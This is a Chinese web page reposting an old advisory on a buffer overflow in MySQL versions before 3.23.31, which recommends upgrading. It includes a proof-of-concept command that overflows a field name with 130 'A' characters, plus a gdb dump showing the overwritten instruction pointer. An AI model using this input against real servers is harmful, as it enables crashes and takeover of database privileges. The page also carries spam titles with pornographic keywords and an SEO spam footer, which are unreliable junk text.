国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數(shù)據(jù)庫 > MySQL > 正文

MySQL3.23.31之前版本的安全漏洞

2024-07-24 12:35:32
字體:
供稿:網(wǎng)友
  所有小于 3.23.31 版本的 MySQL 都存在一個緩沖溢出漏洞導致MySQL 崩潰。使攻擊者獲得 mysqld 權限,而可以操縱所有數(shù)據(jù)庫。攻擊的前提是必須有一個合法的登錄名和口令。
 
  下面為最初發(fā)表于 MySQL 郵件列表的信件摘要。
  ==================================================
  漏洞是由Jo?o Gouveia 于1月12日發(fā)現(xiàn)的:
 
  步驟:
 
  在第一個終端上啟動 mysql:
 
  spike:/var/mysql # /sbin/init.d/mysql start
 
  在另外一個終端上輸入:
 
  jroberto@spike:~ > mysql -p -e ’select a.’`perl -e’printf("A"x130)’`’.b’
 
  Enter password:
 
  (沒有反應?按^C退出)
 
  在第一臺終端上會顯示:
 
  spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault  
  nohup  
  $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin  
  g "$@" >>$err_log 2>&1>  
  Number of processes running now: 0  
  mysqld restarted on Fri Jan 12 07:10:54 WET 2001  
  mysqld daemon ended
  使用 gdb 顯示結(jié)果如下:
 
  (gdb) run  
  Starting program: /usr/sbin/mysqld  
  [New Thread 16897 (manager thread)]  
  [New Thread 16891 (initial thread)]  
  [New Thread 16898]  
  /usr/sbin/mysqld: ready for connections  
  [New Thread 16916]  
  [Switching to Thread 16916]  
  
  Program received signal SIGSEGV, Segmentation fault.  
  0x41414141 in ?? ()  
  (gdb) info all-registers  
  eax 0x1 1  
  ecx 0x68 104  
  edx 0x8166947 135686471  
  ebx 0x41414141 1094795585  
  esp 0xbf5ff408 0xbf5ff408  
  ebp 0x41414141 0x41414141  
  esi 0x41414141 1094795585  
  edi 0x0 0  
  eip 0x41414141 0x41414141  
  eflags 0x10246 66118  
  cs 0x23 35  
  ss 0x2b 43  
  ds 0x2b 43  
  es 0x2b 43  
  fs 0x0 0  
  gs 0x0 0
  其中的 eip 指示就是緩沖溢出了。
 
  解決辦法就是升級到 3.23.31。所以,各位如果還沒有把數(shù)據(jù)庫升級到最新版本,請趕快行動。
 
 

(編輯:武林網(wǎng))

發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 金门县| 刚察县| 泸西县| 浙江省| 南皮县| 隆德县| 阿图什市| 新源县| 大埔县| 绥棱县| 会理县| 常熟市| 江孜县| 浏阳市| 定边县| 奈曼旗| 临邑县| 越西县| 仁怀市| 嘉义市| 青铜峡市| 辽宁省| 鄂托克前旗| 千阳县| 奇台县| 丘北县| 泾川县| 林芝县| 无棣县| 西城区| 扶风县| 太和县| 闽清县| 读书| 叶城县| 大姚县| 聂拉木县| 巴中市| 沁水县| 澄江县| 太仆寺旗|